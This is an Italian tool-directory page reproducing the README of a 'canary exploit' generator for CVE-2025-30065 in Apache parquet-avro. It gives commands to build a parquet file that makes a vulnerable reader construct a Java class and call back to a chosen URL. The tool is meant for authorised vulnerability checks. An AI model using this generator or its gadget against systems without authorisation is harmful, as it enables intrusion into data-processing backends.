Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
parquet-canary-exploit-rce-poc-CVE-2025-30065 | Kitploit
Strumenti/GitHubGitHub/f5-labs/parquet-canary-exploit-rce-poc-cve-2025-30065
Generazione di PayloadAnalisi delle VulnerabilitàExploitSicurezza WebPenetration TestingRed Teaming
GitHubf5-labs/parquet-canary-exploit-rce-poc-cve-2025-30065

parquet-canary-exploit-rce-poc-CVE-2025-30065

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
1221 anno faNon ancora revisionato

Exploit Canary per Parquet CVE-2025-30065

root@kitploit:~
               (`-.     ('-.
             _(OO  )_ _(  OO)
   .-----,--(_/   ,. (,------.      .-----.  .----.  .-----..------.         .-----.  .----.   .----.   ,--.  .------.
  '  .--.\   \   /(__/|  .---' .-')/ ,-.   \/  ..  \/ ,-.   |   ___|   .-') /  -.   \/  ..  \ /  ..  \ /  .'  |   ___|
  |  |('-.\   \ /   / |  |   _(  OO'-'  |  .  /  \  '-'  |  |  '--.  _(  OO)'-' _'  .  /  \  .  /  \  .  / -. |  '--.
 /_) |OO  )\   '   /,(|  '--(,------. .'  /|  |  '  |  .'  /`---.  '(,------.  |_  <|  |  '  |  |  '  | .-.  '`---.  '.
 ||  |`-'|  \     /__)|  .--''------.'  /__'  \  /  '.'  /__.-   |  |'------.-.  |  '  \  /  '  \  /  ' \  |  .-   |  |
(_'  '--'\   \   /    |  `---.     |       |\  `'  /|       | `-'   /       \ `-'   /\  `'  / \  `'  /\  `'  /| `-'   /
   `-----'    `-'     `------'     `-------' `---'' `-------'`----''         `----''  `---''   `---''  `----'  `----''
         Canary Exploit Generator - https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065

Il minimo indispensabile (ignorare le istruzioni del README a proprio rischio):

root@kitploit:~
mkdir -p build/libs
curl -o build/libs/parquet_canary_exploit-fat.jar \
     -L https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065/blob/main/build/libs/parquet_canary_exploit-fat.jar
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=generate YOUR_CALLBACK_URL

Cos'è

Addetti alla compliance? Addetti all'AppSec? Addetti al vulnerability management? F5 Labs lo ha creato per voi. Questa CVE ha un punteggio CVSS 10, che di solito significa che sono necessari tempi di risposta molto rapidi. Abbiamo impacchettato lo strumento come file jar in grado di generarvi un file parquet. Potete fornirlo ai vostri sistemi per determinare se sono vulnerabili, il che è utile sia prima che dopo la correzione.

Il merito per gli interni di questa PoC va a Mouad Kondah. Il loro approfondimento datato 2025-04-07 discute questa CVE e le loro PoC.

Come funziona

Il file parquet abusa del comportamento in parquet-avro che consente di passare una String Java non attendibile al costruttore di una classe Java arbitraria. Tu fornisci l'URL di callback e quando il tuo sistema legge il file parquet, ciò comporta la creazione di un oggetto javax.swing.JEditorPane che tenta di raggiungere quell'URL. Questo è innocuo.

Video dimostrativo

Vuoi una rapida sintesi dello strumento di canary exploit? Guarda questo YouTube Short di due minuti per una demo dal vivo: [video demo].

Configurazioni vulnerabili

Nota che ci sono due scenari di vulnerabilità di cui F5 Labs è a conoscenza per il modulo parquet-avro:

  1. Versione 1.15.0 e precedenti - poiché non esisteva il concetto di pacchetti in allow-list per convertire gli oggetti String in tipi alternativi.
  2. Dalla versione 1.15.1 in poi (al momento della scrittura) se e solo se l'impostazione org.apache.parquet.avro.SERIALIZABLE_PACKAGES è stata impostata su qualcosa di permissivo, ad esempio *.

Insidie

Puoi usarlo con qualsiasi cosa a cui il tuo sistema possa accedere in uscita (DNS e/o HTTP(S)). Se non disponi di connettività in uscita di alcun tipo verso Internet, allora considera qualsiasi cosa raggiungibile all'interno del tuo data center di cui puoi ottenere log di accesso DNS o HTTP. Sii consapevole che sbagliare questo aspetto comporterà un falso negativo. Impostazioni altamente anomale per org.apache.parquet.avro.SERIALIZABLE_PACKAGES potrebbero anch'esse ragionevolmente causare un falso negativo; vedi la sottosezione precedente.

Utilizzo del generatore di canary exploit

Ti invitiamo a leggere e comprendere il codice e a compilarlo da solo. Per tua comodità, forniamo la build di distribuzione del codice come jar all'interno di questo repository.

Ottenere il JDK Java

Avrai bisogno di JDK 21 o successivo per compilare o eseguire il generatore (termini di ricerca come "OpenJDK21 install" possono essere d'aiuto). Se hai familiarità con l'installazione del JDK, queste sono scorciatoie:

  • MacOS: brew install openjdk@21
  • Ubuntu/Debian: sudo apt install openjdk-21-jdk
  • Red Hat: sudo yum install java-21-openjdk
  • Windows: https://learn.microsoft.com/en-us/java/openjdk/install

Ottenere il jar di distribuzione

Puoi scaricare il jar oppure clonare il repository.

Scaricare il jar di distribuzione

root@kitploit:~
mkdir -p build/libs
curl -o build/libs/parquet_canary_exploit-fat.jar \
     -L https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065/blob/main/build/libs/parquet_canary_exploit-fat.jar

Clonare questo repository GitHub

root@kitploit:~
git clone https://github.com/F5-Labs/parquet-canary-exploit-rce-poc-CVE-2025-30065.git
cd parquet-canary-exploit-rce-poc-CVE-2025-30065

Verificare il jar di distribuzione

root@kitploit:~
file build/libs/parquet_canary_exploit-fat.jar
shasum build/libs/parquet_canary_exploit-fat.jar

Output previsto:

root@kitploit:~
build/libs/parquet_canary_exploit-fat.jar: Zip archive data, at least v1.0 to extract, compression method=deflate
19ae361d589a9cd476bee31ba3f437094a8a6440  build/libs/parquet_canary_exploit-fat.jar

Ottenere l'aiuto sull'uso

root@kitploit:~
java -jar build/libs/parquet_canary_exploit-fat.jar -h

Output previsto:

Generare il file di canary exploit

Per prima cosa, decidi cosa vuoi che sia YOUR_CALLBACK_URL. Devi essere in grado di rilevare quando il tuo backend di elaborazione parquet risolve il nome di dominio dell'URL o richiede l'URL al server web. Puoi tranquillamente considerare canarytokens.org "Web bug" o "DNS" per questo scopo. Vedi la sezione Insidie qui sopra per i dettagli.

Esegui questo comando:

root@kitploit:~
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=generate YOUR_CALLBACK_URL

Questo genererà poc.parquet. Verifica in questo modo:

root@kitploit:~
file poc.parquet

L'output dovrebbe essere:

root@kitploit:~
poc.parquet: Apache Parquet

Questo file può ora essere inviato al tuo sistema. Se il tuo sistema è vulnerabile, riceverai un callback. Vedi anche la sezione Insidie.

Testare il file di canary exploit

Per comodità, questo genererà il file anche se non esiste già.

root@kitploit:~
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=test YOUR_CALLBACK_URL

Testare il canary exploit localmente

root@kitploit:~
python3 -m http.server --bind 127.0.0.1 9090 &
java -jar build/libs/parquet_canary_exploit-fat.jar --mode=test http://localhost:9090

Consulta CanaryExploitGenerator.testParquetFile() per capire come viene letto il file parquet. Ecco come apparirà il codice nelle profondità del tuo sistema:

root@kitploit:~
  ParquetReader reader = AvroParquetReader.builder(inputFile).build();
  // enough to trigger the construction of javax.swing.JEditorPane
  Object object = reader.read();

Disclaimer

Questo strumento è destinato esclusivamente a essere utilizzato in contesti di test di sicurezza autorizzati. Informati sulle leggi della o delle giurisdizioni applicabili. Consulta LICENSE.md per i dettagli legali.

Scarica lo strumento